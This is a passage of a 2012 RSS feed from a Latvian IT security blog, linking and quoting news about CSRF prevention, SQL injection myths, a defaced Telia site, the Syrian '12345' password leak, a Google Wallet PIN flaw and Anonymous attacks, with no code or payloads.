<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>IT sviestapika &#187; Drošība</title>
	<atom:link href="http://dll.lv/category/drosiba/feed" rel="self" type="application/rss+xml" />
	<link>http://dll.lv</link>
	<description>Par IT un ne tikai</description>
	<lastBuildDate>Sat, 28 Apr 2012 07:53:32 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.2</generator>
		<item>
		<title>Double Submit problēmas risinājums</title>
		<link>http://dll.lv/double-submit-problemas-risinajums?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=double-submit-problemas-risinajums</link>
		<comments>http://dll.lv/double-submit-problemas-risinajums#comments</comments>
		<pubDate>Fri, 27 Apr 2012 20:20:39 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Drošība]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[Web]]></category>
		<category><![CDATA[csrf]]></category>
		<category><![CDATA[double submit]]></category>
		<category><![CDATA[get]]></category>
		<category><![CDATA[post]]></category>
		<category><![CDATA[redirect]]></category>
		<category><![CDATA[redirect after post]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1994</guid>
		<description><![CDATA[Diezgan pavecs, bet labs raksts, kur aprakstīts, ka to var atrisināt izmantojot GET pieprasījumu ar redirektu pēc POST vai arī izmantojot unikālas vērtības. Kombinējot abus variantus var veiksmīgi izvairīties arī no CSRF. Redirekta piemērs priekš PHP. Related posts: Kā nodemonstrēt XSS &#8230; <a href="http://dll.lv/double-submit-problemas-risinajums">Continue reading <span class="meta-nav">&#8594;</span></a>
Related posts:<ol>
<li><a href='http://dll.lv/ka-nodemonstret-xss-ievainojamibu' rel='bookmark' title='Kā nodemonstrēt XSS ievainojamību'>Kā nodemonstrēt XSS ievainojamību</a></li>
<li><a href='http://dll.lv/aizstajam-vai-izmainam-izvadamo-kodu-izmantojot-javascript' rel='bookmark' title='Aizstājam vai izmainām izvadāmo kodu izmantojot javascript'>Aizstājam vai izmainām izvadāmo kodu izmantojot javascript</a></li>
<li><a href='http://dll.lv/atbrivojamies-no-komentaru-spama' rel='bookmark' title='Atbrīvojamies no komentāru spama'>Atbrīvojamies no komentāru spama</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Diezgan pavecs, bet labs<a href="http://www.theserverside.com/news/1365146/Redirect-After-Post"> raksts</a>, kur aprakstīts, ka to var atrisināt izmantojot GET pieprasījumu ar redirektu pēc POST vai arī izmantojot unikālas<a href="http://www.phpro.org/tutorials/Preventing-Multiple-Submits.html"> vērtības</a>.</p>
<p>Kombinējot abus variantus var veiksmīgi izvairīties arī no CSRF.</p>
<p>Redirekta piemērs priekš <a href="http://www.thefutureoftheweb.com/blog/get-redirect-after-post">PHP.</a></p>
<p>Related posts:<ol>
<li><a href='http://dll.lv/ka-nodemonstret-xss-ievainojamibu' rel='bookmark' title='Kā nodemonstrēt XSS ievainojamību'>Kā nodemonstrēt XSS ievainojamību</a></li>
<li><a href='http://dll.lv/aizstajam-vai-izmainam-izvadamo-kodu-izmantojot-javascript' rel='bookmark' title='Aizstājam vai izmainām izvadāmo kodu izmantojot javascript'>Aizstājam vai izmainām izvadāmo kodu izmantojot javascript</a></li>
<li><a href='http://dll.lv/atbrivojamies-no-komentaru-spama' rel='bookmark' title='Atbrīvojamies no komentāru spama'>Atbrīvojamies no komentāru spama</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://dll.lv/double-submit-problemas-risinajums/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>SQL injection prezentācija</title>
		<link>http://dll.lv/sql-injection-prezentacija?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=sql-injection-prezentacija</link>
		<comments>http://dll.lv/sql-injection-prezentacija#comments</comments>
		<pubDate>Wed, 25 Apr 2012 15:53:27 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Apmācība]]></category>
		<category><![CDATA[Drošība]]></category>
		<category><![CDATA[How to]]></category>
		<category><![CDATA[Interesanti]]></category>
		<category><![CDATA[Kopums]]></category>
		<category><![CDATA[Web]]></category>
		<category><![CDATA[prezentācija]]></category>
		<category><![CDATA[SQL]]></category>
		<category><![CDATA[sql injection]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1980</guid>
		<description><![CDATA[Diezgan laba un svaiga prezentācija par SQL injekcēšanu, kļūdām un mītiem. Sql Injection Myths and Fallacies View more presentations from Karwin Software Solutions LLC Related posts: www.atlaizuklubs.lv SQL kļūda Kā nodemonstrēt XSS ievainojamību Aizstājam vai izmainām izvadāmo kodu izmantojot javascript
Related posts:<ol>
<li><a href='http://dll.lv/www-atlaizuklubs-lv-sql-kluda' rel='bookmark' title='www.atlaizuklubs.lv SQL kļūda'>www.atlaizuklubs.lv SQL kļūda</a></li>
<li><a href='http://dll.lv/ka-nodemonstret-xss-ievainojamibu' rel='bookmark' title='Kā nodemonstrēt XSS ievainojamību'>Kā nodemonstrēt XSS ievainojamību</a></li>
<li><a href='http://dll.lv/aizstajam-vai-izmainam-izvadamo-kodu-izmantojot-javascript' rel='bookmark' title='Aizstājam vai izmainām izvadāmo kodu izmantojot javascript'>Aizstājam vai izmainām izvadāmo kodu izmantojot javascript</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Diezgan laba un svaiga prezentācija par SQL injekcēšanu, kļūdām un mītiem.</p>
<div style="width:425px" id="__ss_3729931"> <strong style="display:block;margin:12px 0 4px"><a href="http://www.slideshare.net/billkarwin/sql-injection-myths-and-fallacies" title="Sql Injection Myths and Fallacies" target="_blank">Sql Injection Myths and Fallacies</a></strong> <iframe src="http://www.slideshare.net/slideshow/embed_code/3729931" width="425" height="355" frameborder="0" marginwidth="0" marginheight="0" scrolling="no"></iframe>
<div style="padding:5px 0 12px"> View more <a href="http://www.slideshare.net/" target="_blank">presentations</a> from <a href="http://www.slideshare.net/billkarwin" target="_blank">Karwin Software Solutions LLC</a> </div>
</p></div>
<p>Related posts:<ol>
<li><a href='http://dll.lv/www-atlaizuklubs-lv-sql-kluda' rel='bookmark' title='www.atlaizuklubs.lv SQL kļūda'>www.atlaizuklubs.lv SQL kļūda</a></li>
<li><a href='http://dll.lv/ka-nodemonstret-xss-ievainojamibu' rel='bookmark' title='Kā nodemonstrēt XSS ievainojamību'>Kā nodemonstrēt XSS ievainojamību</a></li>
<li><a href='http://dll.lv/aizstajam-vai-izmainam-izvadamo-kodu-izmantojot-javascript' rel='bookmark' title='Aizstājam vai izmainām izvadāmo kodu izmantojot javascript'>Aizstājam vai izmainām izvadāmo kodu izmantojot javascript</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://dll.lv/sql-injection-prezentacija/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Telia mājaslapa uzurķēta</title>
		<link>http://dll.lv/telia-majaslapa-uzurketa?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=telia-majaslapa-uzurketa</link>
		<comments>http://dll.lv/telia-majaslapa-uzurketa#comments</comments>
		<pubDate>Thu, 05 Apr 2012 17:07:24 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Drošība]]></category>
		<category><![CDATA[Drošības caurumi]]></category>
		<category><![CDATA[Interesanti]]></category>
		<category><![CDATA[Kopums]]></category>
		<category><![CDATA[drošības]]></category>
		<category><![CDATA[drošības testēšana]]></category>
		<category><![CDATA[Incidents]]></category>
		<category><![CDATA[Telia]]></category>
		<category><![CDATA[telia.lv]]></category>
		<category><![CDATA[urķēšana]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1927</guid>
		<description><![CDATA[Vakar daudzi runāja par Telia.lv lapas uzlaušanu, kas izpaudās kā gandrīz neredzamu linku uz citiem resursiem ievietošanu šajā lapā: http://telia.lv/lv/par-mums/jaunumi. Ekrānšāviņš no twitter: http://twitter.com/#!/laacz/status/187426840640626688/photo/1 Šādus uzbrukumus ir diezgan grūti atklāt (tāds ir viņu mērķis) un tie galvenokārt kalpo, lai palielinātu &#8230; <a href="http://dll.lv/telia-majaslapa-uzurketa">Continue reading <span class="meta-nav">&#8594;</span></a>
Related posts:<ol>
<li><a href='http://dll.lv/drosibas-caurums-csdd-un-parex-majaslapa' rel='bookmark' title='Drošības caurums CSDD un Parex mājaslapā'>Drošības caurums CSDD un Parex mājaslapā</a></li>
<li><a href='http://dll.lv/uzlauzta-mezavairogu-majaslapa' rel='bookmark' title='Uzlauzta &#8220;Mežavairogu&#8221; mājaslapa.'>Uzlauzta &#8220;Mežavairogu&#8221; mājaslapa.</a></li>
<li><a href='http://dll.lv/pods-izsmiets-vai-vesture-atkartojas' rel='bookmark' title='Pods izsmiets vai vēsture atkārtojas'>Pods izsmiets vai vēsture atkārtojas</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Vakar daudzi runāja par Telia.lv lapas uzlaušanu, kas izpaudās kā gandrīz neredzamu linku uz citiem resursiem ievietošanu šajā lapā: <a href="http://telia.lv/lv/par-mums/jaunumi">http://telia.lv/lv/par-mums/jaunumi</a>.</p>
<p>Ekrānšāviņš no twitter:</p>
<p><a href="http://twitter.com/#!/laacz/status/187426840640626688/photo/1">http://twitter.com/#!/laacz/status/187426840640626688/photo/1</a></p>
<p>Šādus uzbrukumus ir diezgan grūti atklāt (tāds ir viņu mērķis) un tie galvenokārt kalpo, lai palielinātu citu lapu reitingu.</p>
<p>Kādu laiku atpakaļ bija iespēja apskatīt arī citu lapu, kurai līdzīgi tikai pievienots liels raksts un padarīts neredzams (iespējams, ka tā lapa jau tāda bija kādu gadu). Atklāju to nejauši, kad apskatīju lapas html.</p>
<p>Laikam ir atklāts jauns uzlaušanas virziens un šos meistarus laikam var nosaukt par pus melniem urķiem, jo viņu uzdevums nav nograut resursu, bet tikai palīdzēt citai lapai.</p>
<p>Tomēr konstatējot šādu gadījumu vajadzētu noteikti atklāt ievainojamības cēloni, jo nākamais urķis var nebūt tik „nevainīgs”.</p>
<p>Related posts:<ol>
<li><a href='http://dll.lv/drosibas-caurums-csdd-un-parex-majaslapa' rel='bookmark' title='Drošības caurums CSDD un Parex mājaslapā'>Drošības caurums CSDD un Parex mājaslapā</a></li>
<li><a href='http://dll.lv/uzlauzta-mezavairogu-majaslapa' rel='bookmark' title='Uzlauzta &#8220;Mežavairogu&#8221; mājaslapa.'>Uzlauzta &#8220;Mežavairogu&#8221; mājaslapa.</a></li>
<li><a href='http://dll.lv/pods-izsmiets-vai-vesture-atkartojas' rel='bookmark' title='Pods izsmiets vai vēsture atkārtojas'>Pods izsmiets vai vēsture atkārtojas</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://dll.lv/telia-majaslapa-uzurketa/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>VISA tehnisks downtime uz 40 minūtēm</title>
		<link>http://dll.lv/visa-tehnisks-downtime-uz-40-minutem?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=visa-tehnisks-downtime-uz-40-minutem</link>
		<comments>http://dll.lv/visa-tehnisks-downtime-uz-40-minutem#comments</comments>
		<pubDate>Mon, 02 Apr 2012 10:45:50 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Drošība]]></category>
		<category><![CDATA[Interesanti]]></category>
		<category><![CDATA[Kopums]]></category>
		<category><![CDATA[downtime]]></category>
		<category><![CDATA[Incidents]]></category>
		<category><![CDATA[visa downtime]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1920</guid>
		<description><![CDATA[Piefiksēsim vēsturei: Kā raksta http://www.businessinsider.com/visa-network-outage-2012-4 svētdien VISA bija 40 minūtes Downtime, ko izraisīja pēdējie uzlabošanas darbi. Lai kā inženieri censtos problēmas gadās. &#160; Related posts: Vadipats.lv tehniskais downtime Kā nodemonstrēt XSS ievainojamību Aizstājam vai izmainām izvadāmo kodu izmantojot javascript
Related posts:<ol>
<li><a href='http://dll.lv/vadipats-lv-tehniskais-downtime' rel='bookmark' title='Vadipats.lv tehniskais downtime'>Vadipats.lv tehniskais downtime</a></li>
<li><a href='http://dll.lv/ka-nodemonstret-xss-ievainojamibu' rel='bookmark' title='Kā nodemonstrēt XSS ievainojamību'>Kā nodemonstrēt XSS ievainojamību</a></li>
<li><a href='http://dll.lv/aizstajam-vai-izmainam-izvadamo-kodu-izmantojot-javascript' rel='bookmark' title='Aizstājam vai izmainām izvadāmo kodu izmantojot javascript'>Aizstājam vai izmainām izvadāmo kodu izmantojot javascript</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Piefiksēsim vēsturei:</p>
<p>Kā raksta <a href="http://www.businessinsider.com/visa-network-outage-2012-4">http://www.businessinsider.com/visa-network-outage-2012-4</a> svētdien VISA bija 40 minūtes Downtime, ko izraisīja pēdējie uzlabošanas darbi.<br />
Lai kā inženieri censtos problēmas gadās.</p>
<p>&nbsp;</p>
<p>Related posts:<ol>
<li><a href='http://dll.lv/vadipats-lv-tehniskais-downtime' rel='bookmark' title='Vadipats.lv tehniskais downtime'>Vadipats.lv tehniskais downtime</a></li>
<li><a href='http://dll.lv/ka-nodemonstret-xss-ievainojamibu' rel='bookmark' title='Kā nodemonstrēt XSS ievainojamību'>Kā nodemonstrēt XSS ievainojamību</a></li>
<li><a href='http://dll.lv/aizstajam-vai-izmainam-izvadamo-kodu-izmantojot-javascript' rel='bookmark' title='Aizstājam vai izmainām izvadāmo kodu izmantojot javascript'>Aizstājam vai izmainām izvadāmo kodu izmantojot javascript</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://dll.lv/visa-tehnisks-downtime-uz-40-minutem/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Prezentācija :Datoru vīrusu evolūcija</title>
		<link>http://dll.lv/prezentacija-datoru-virusu-evolucija?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=prezentacija-datoru-virusu-evolucija</link>
		<comments>http://dll.lv/prezentacija-datoru-virusu-evolucija#comments</comments>
		<pubDate>Mon, 26 Mar 2012 12:05:04 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Apmācība]]></category>
		<category><![CDATA[Drošība]]></category>
		<category><![CDATA[Interesanti]]></category>
		<category><![CDATA[Kopums]]></category>
		<category><![CDATA[antivīrus]]></category>
		<category><![CDATA[Defcon 19]]></category>
		<category><![CDATA[Defcon 19 - The History And Evolution Of Computer Viruses]]></category>
		<category><![CDATA[Stuxnet]]></category>
		<category><![CDATA[The History And Evolution Of Computer Viruses]]></category>
		<category><![CDATA[vīrus]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1886</guid>
		<description><![CDATA[Interesanta prezentācija par datoru vīrusu evolūciju, kā tie attīstījās un kā attīstījās to rakstītāji. Prezentācija ir no Defcon 19 &#8211; The History And Evolution Of Computer Viruses. Related posts: Kā nodemonstrēt XSS ievainojamību Aizstājam vai izmainām izvadāmo kodu izmantojot javascript &#8230; <a href="http://dll.lv/prezentacija-datoru-virusu-evolucija">Continue reading <span class="meta-nav">&#8594;</span></a>
Related posts:<ol>
<li><a href='http://dll.lv/ka-nodemonstret-xss-ievainojamibu' rel='bookmark' title='Kā nodemonstrēt XSS ievainojamību'>Kā nodemonstrēt XSS ievainojamību</a></li>
<li><a href='http://dll.lv/aizstajam-vai-izmainam-izvadamo-kodu-izmantojot-javascript' rel='bookmark' title='Aizstājam vai izmainām izvadāmo kodu izmantojot javascript'>Aizstājam vai izmainām izvadāmo kodu izmantojot javascript</a></li>
<li><a href='http://dll.lv/atbrivojamies-no-komentaru-spama' rel='bookmark' title='Atbrīvojamies no komentāru spama'>Atbrīvojamies no komentāru spama</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Interesanta prezentācija par datoru vīrusu evolūciju, kā tie attīstījās un kā attīstījās to rakstītāji.<br />
Prezentācija ir no Defcon 19 &#8211; The History And Evolution Of Computer Viruses.</p>
<p><iframe width="640" height="480" src="http://www.youtube.com/embed/lvLCt7eIXHU" frameborder="0" allowfullscreen></iframe></p>
<p>Related posts:<ol>
<li><a href='http://dll.lv/ka-nodemonstret-xss-ievainojamibu' rel='bookmark' title='Kā nodemonstrēt XSS ievainojamību'>Kā nodemonstrēt XSS ievainojamību</a></li>
<li><a href='http://dll.lv/aizstajam-vai-izmainam-izvadamo-kodu-izmantojot-javascript' rel='bookmark' title='Aizstājam vai izmainām izvadāmo kodu izmantojot javascript'>Aizstājam vai izmainām izvadāmo kodu izmantojot javascript</a></li>
<li><a href='http://dll.lv/atbrivojamies-no-komentaru-spama' rel='bookmark' title='Atbrīvojamies no komentāru spama'>Atbrīvojamies no komentāru spama</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://dll.lv/prezentacija-datoru-virusu-evolucija/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Sīrijas prezidents lietojis paroli &#8220;12345&#8243;</title>
		<link>http://dll.lv/sirijas-prezidents-lietojis-paroli-12345?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=sirijas-prezidents-lietojis-paroli-12345</link>
		<comments>http://dll.lv/sirijas-prezidents-lietojis-paroli-12345#comments</comments>
		<pubDate>Thu, 16 Feb 2012 02:48:30 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Drošības caurumi]]></category>
		<category><![CDATA[Interesanti]]></category>
		<category><![CDATA[Kopums]]></category>
		<category><![CDATA[12345]]></category>
		<category><![CDATA[Anonymous]]></category>
		<category><![CDATA[autentifikācija]]></category>
		<category><![CDATA[autorizācija]]></category>
		<category><![CDATA[parole]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1848</guid>
		<description><![CDATA[Šādi gadījumi apliecina, ka ar paroles labās prakses publicēšanu vien nepietiek un prasības ir jāiestrādā pašā sistēmā, lai &#8220;lietotājiem&#8221; nebūtu iespējams tā kļūdīties. mashable.com Syrian President Bashar al-Assad has been under fire from world leaders to step down this week. &#8230; <a href="http://dll.lv/sirijas-prezidents-lietojis-paroli-12345">Continue reading <span class="meta-nav">&#8594;</span></a>
Related posts:<ol>
<li><a href='http://dll.lv/kas-notiek-ievadot-lietotajvardu-un-paroli' rel='bookmark' title='Kas notiek ievadot lietotājvārdu un paroli?'>Kas notiek ievadot lietotājvārdu un paroli?</a></li>
<li><a href='http://dll.lv/anonymous-izkemojusi-cip-majaslapu' rel='bookmark' title='Anonymous izķēmojuši CIP mājaslapu'>Anonymous izķēmojuši CIP mājaslapu</a></li>
<li><a href='http://dll.lv/google-i-nozagts-gaia-izejas-kods' rel='bookmark' title='Google (i) nozagts Gaia izejas kods :)'>Google (i) nozagts Gaia izejas kods :)</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Šādi gadījumi apliecina, ka ar paroles labās prakses publicēšanu vien nepietiek un prasības ir jāiestrādā pašā sistēmā, lai &#8220;lietotājiem&#8221; nebūtu iespējams tā kļūdīties.<br />
<a href="http://mashable.com/2012/02/07/anonymous-assad-email-password/">mashable.com</a></p>
<blockquote><p>Syrian President Bashar al-Assad has been under fire from world leaders to step down this week. He’s also under fire from hacktivist group Anonymous, who leaked hundreds of his office’s emails on Monday.</p>
<p>While Anonymous is infamous for its hacking know-how, it doesn’t take a genius computer programmer to guess one of the passwords commonly used by Assad’s office accounts: 12345. The string of consecutive numbers is the second-weakest password according to a 2011 study.</p>
<p>Anonymous broke into the mail server of the Syrian Ministry of Presidential Affairs, accessing some 78 inboxes of Assad’s staffers, according a report from Israeli daily Haaretz. The password 12345 was associated with several of the accounts.</p>
<p>Mansour Fadlallah Azzam, the minister of presidential affairs and Bouthaina Shaaban, Assad’s media adviser, were among the victims of the inbox hacks.</p>
<p>Haaretz obtained and published one email that included documents intended to prepare the Syrian leader for his December 2011 interview with Barbara Walters. In the interview, Assad claimed the Syrian government was not killing its people.</p>
<p>“We don’t kill our people,” Assad told ABC “No government in the world kills its people, unless it’s led by a crazy person.”</p>
<p>In the leaked email, Syrian spokesperson at the U.N. Sheherazad Jaafari advised Shabaan and Luna Chebel, a former Al Jazeera reporter and current Assad staffer, on what the Syrian president should say to manipulate Americans:</p>
<p>“It is hugely important and worth mentioning that ‘mistakes’ have been done in the beginning of the crises because we did not have a well-organized ‘police force.’ American psyche can be easily manipulated when they hear that there are ‘mistakes’ done and now we are ‘fixing it.’ It’s worth mentioning also what is happening now in Wall Street and the way the demonstrations are been suppressed by policemen, police dogs and beatings.</p>
<p>“The major points and dimensions that have been mentioned a lot in the American media are: The idea of violence has been one of the major subjects brought up in every article. They use the phrases ‘The Syrian government is killing its own people,’ ‘Tanks have been used in many cities,’ ‘Airplanes have been used to suppress the peaceful demonstrations,’ and ‘Security forces are criminals and bloody.’”</p>
<p>Jaafari’s email also advised that Assad should emphasize the openness of Facebook and YouTube to show the true situation in Syria. Press entry restrictions should be spun as a proactive measure not to have foreign journalists misrepresent the country.</p>
<p>What do you think of Anonymous’s vigilante role in international affairs? Is diplomacy the place for hacktivists? Let us know what you think in the comments.</p></blockquote>
<p>Related posts:<ol>
<li><a href='http://dll.lv/kas-notiek-ievadot-lietotajvardu-un-paroli' rel='bookmark' title='Kas notiek ievadot lietotājvārdu un paroli?'>Kas notiek ievadot lietotājvārdu un paroli?</a></li>
<li><a href='http://dll.lv/anonymous-izkemojusi-cip-majaslapu' rel='bookmark' title='Anonymous izķēmojuši CIP mājaslapu'>Anonymous izķēmojuši CIP mājaslapu</a></li>
<li><a href='http://dll.lv/google-i-nozagts-gaia-izejas-kods' rel='bookmark' title='Google (i) nozagts Gaia izejas kods :)'>Google (i) nozagts Gaia izejas kods :)</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://dll.lv/sirijas-prezidents-lietojis-paroli-12345/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Google wallet var patukšot tavu kabatu</title>
		<link>http://dll.lv/google-wallet-var-patuksot-tavu-kabatu?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=google-wallet-var-patuksot-tavu-kabatu</link>
		<comments>http://dll.lv/google-wallet-var-patuksot-tavu-kabatu#comments</comments>
		<pubDate>Tue, 14 Feb 2012 06:00:50 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Drošības caurumi]]></category>
		<category><![CDATA[Interesanti]]></category>
		<category><![CDATA[Kopums]]></category>
		<category><![CDATA[google]]></category>
		<category><![CDATA[google wallet]]></category>
		<category><![CDATA[IT drošība]]></category>
		<category><![CDATA[IT projektu problēms]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1842</guid>
		<description><![CDATA[Ielaist kļūdas savā programmatūrā (Google wallet) izdodas arī tādiem milžiem kā google. Tas apliecina, ka paļaties uz brendu (pieejamo speciālistu un testētāju armiju) nevar un produkts jāsāk lietot tikai pēc ilgāka laika, kad visas blusas ir publiski izķertas un jaunas &#8230; <a href="http://dll.lv/google-wallet-var-patuksot-tavu-kabatu">Continue reading <span class="meta-nav">&#8594;</span></a>
Related posts:<ol>
<li><a href='http://dll.lv/google-i-nozagts-gaia-izejas-kods' rel='bookmark' title='Google (i) nozagts Gaia izejas kods :)'>Google (i) nozagts Gaia izejas kods :)</a></li>
<li><a href='http://dll.lv/mazs-google-ihack' rel='bookmark' title='Mazs google ihack'>Mazs google ihack</a></li>
<li><a href='http://dll.lv/gantt-chart-un-google-doc' rel='bookmark' title='Gantt chart un google doc'>Gantt chart un google doc</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Ielaist kļūdas savā programmatūrā (Google wallet) izdodas arī tādiem milžiem kā google. Tas apliecina, ka paļaties uz brendu (pieejamo speciālistu un testētāju armiju) nevar un produkts jāsāk lietot tikai pēc ilgāka laika, kad visas blusas ir publiski izķertas un jaunas nav vēl savairojušās.<br />
<a href="http://news.cnet.com/8301-1009_3-57374589-83/latest-google-wallet-hack-picks-your-pocket/">cnet.com</a></p>
<blockquote><p>Google Wallet users might be wise to start getting a little nervous.<br />
Yesterday, researchers outlined a complicated way to crack the Google Wallet PIN used to make purchases with the smartphone-based payment system. Now there&#8217;s a new hack that could let a stranger gain access to the funds of Wallet users.<br />
Described yesterday by blogging site The Smartphone Champ, the hack doesn&#8217;t require extra software, root access, or any particular skills in general.<br />
Instead, all someone apparently has to do it clear the data for the Google Wallet app in the smartphone&#8217;s application settings menu. The app is then reset and will prompt the person to enter a new pin number the next time it launches. Since the Google Wallet information is linked to the device and not to the actual account, a person can then use the Google prepaid card already tied to the device to gain full access to the owner&#8217;s funds, explained The Smartphone Champ.<br />
This latest Google Wallet hack follows an earlier hack reported by security blogging site Zvelo.<br />
That one, however, required root access to the device, something that requires a certain amount of time, effort, and skill (or luck) to acquire. But the new hack can be performed by anyone within a matter of minutes.<br />
Android blogging site Android and Me tested the hack and found that it worked on a Galaxy Nexus phone with the latest official version of Google Wallet.<br />
In response to the hack, a Google spokesman sent CNET the following statement:<br />
&#8220;We strongly encourage anyone who loses or wants to sell their phone to call Google Wallet support toll-free at 855-492-5538 to disable the prepaid card. We are currently working on an automated fix as well that will be available soon. We also advise all Wallet users to set up a screen lock as an additional layer of protection for their phone.&#8221;</p></blockquote>
<p>Related posts:<ol>
<li><a href='http://dll.lv/google-i-nozagts-gaia-izejas-kods' rel='bookmark' title='Google (i) nozagts Gaia izejas kods :)'>Google (i) nozagts Gaia izejas kods :)</a></li>
<li><a href='http://dll.lv/mazs-google-ihack' rel='bookmark' title='Mazs google ihack'>Mazs google ihack</a></li>
<li><a href='http://dll.lv/gantt-chart-un-google-doc' rel='bookmark' title='Gantt chart un google doc'>Gantt chart un google doc</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://dll.lv/google-wallet-var-patuksot-tavu-kabatu/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Anonymous izķēmojuši CIP mājaslapu</title>
		<link>http://dll.lv/anonymous-izkemojusi-cip-majaslapu?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=anonymous-izkemojusi-cip-majaslapu</link>
		<comments>http://dll.lv/anonymous-izkemojusi-cip-majaslapu#comments</comments>
		<pubDate>Mon, 13 Feb 2012 06:00:07 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Drošības caurumi]]></category>
		<category><![CDATA[Kopums]]></category>
		<category><![CDATA[Anonymous]]></category>
		<category><![CDATA[CIP]]></category>
		<category><![CDATA[IT drošība]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1836</guid>
		<description><![CDATA[Piefiksējam faktu no Forbes.ry. Хакеры Anonymous в ночь на субботу (по московскому времени) взломали сайт Центрального разведывательного управления США (ЦРУ). На странице хакерской группировки @YourAnonNews в сервисе микроблогов Twitter они оставили сообщение «CIA Tango down», которое можно перевести на русский &#8230; <a href="http://dll.lv/anonymous-izkemojusi-cip-majaslapu">Continue reading <span class="meta-nav">&#8594;</span></a>
No related posts.]]></description>
			<content:encoded><![CDATA[<p>Piefiksējam faktu no <a href="http://www.forbes.ru/news/79183-hakery-anonymous-vzlomali-sait-tsru">Forbes.ry</a>.</p>
<blockquote><p>
Хакеры Anonymous в ночь на субботу (по московскому времени) взломали сайт Центрального разведывательного управления США (ЦРУ). На странице хакерской группировки @YourAnonNews в сервисе микроблогов Twitter они оставили сообщение «CIA Tango down», которое можно перевести на русский язык следующим образом: «ЦРУ ликвидировано» (выражение «Tango down» обычно используется спецслужбами для подтверждения факта устранения вражеского объекта). Ответственность за атаку на веб-ресурс ведомства взяла на себя хакерская группировка Anonymous. Какую именно цель преследовали хакеры Anonymous для атаки на сайт ЦРУ, они не уточнили.</p>
<p>Представитель ЦРУ подтвердила информацию о возникших после атаки хакерской группы Anonymous проблемах с веб-ресурсом разведуправления и сообщила, что к 09.00 мск сайт возобновил свою работу.</p>
<p>Как сообщает РИА «Новости», это уже не первая атака Anonymous на сайты американских государственных ведомств. В январе хакеры вывели из строя веб-ресурсы Минюста США и Федерального бюро расследований (ФБР), протестуя таким образом против закрытия «файлообменника» Megaupload и ареста его руководителей.</p>
<p>Хакерская группа Anonymous стала по-настоящему известной в конце 2010 года, когда ее представители предприняли серию DDoS-атак на сайты компаний и организаций, противодействовавших деятельности разоблачительного ресурса WikiLeaks. В числе атакованных &#8211; сайты PayPal, Visa и MasterСard. Позже целями группировки, объединившейся с хакерами из LulzSec, также становились сайты компаний Sony, Nintendo, PBS, сайт Сената США, правительственные сайты Бразилии, Мексики, Италии и ряд других ресурсов.</p></blockquote>
<p>No related posts.</p>]]></content:encoded>
			<wfw:commentRss>http://dll.lv/anonymous-izkemojusi-cip-majaslapu/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Apollo raksta, ka bija ievainojama probacija.lv mājaslapa</title>
		<link>http://dll.lv/apollo-raksta-ka-bija-ievainojama-probacija-lv-majaslapa?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=apollo-raksta-ka-bija-ievainojama-probacija-lv-majaslapa</link>
		<comments>http://dll.lv/apollo-raksta-ka-bija-ievainojama-probacija-lv-majaslapa#comments</comments>
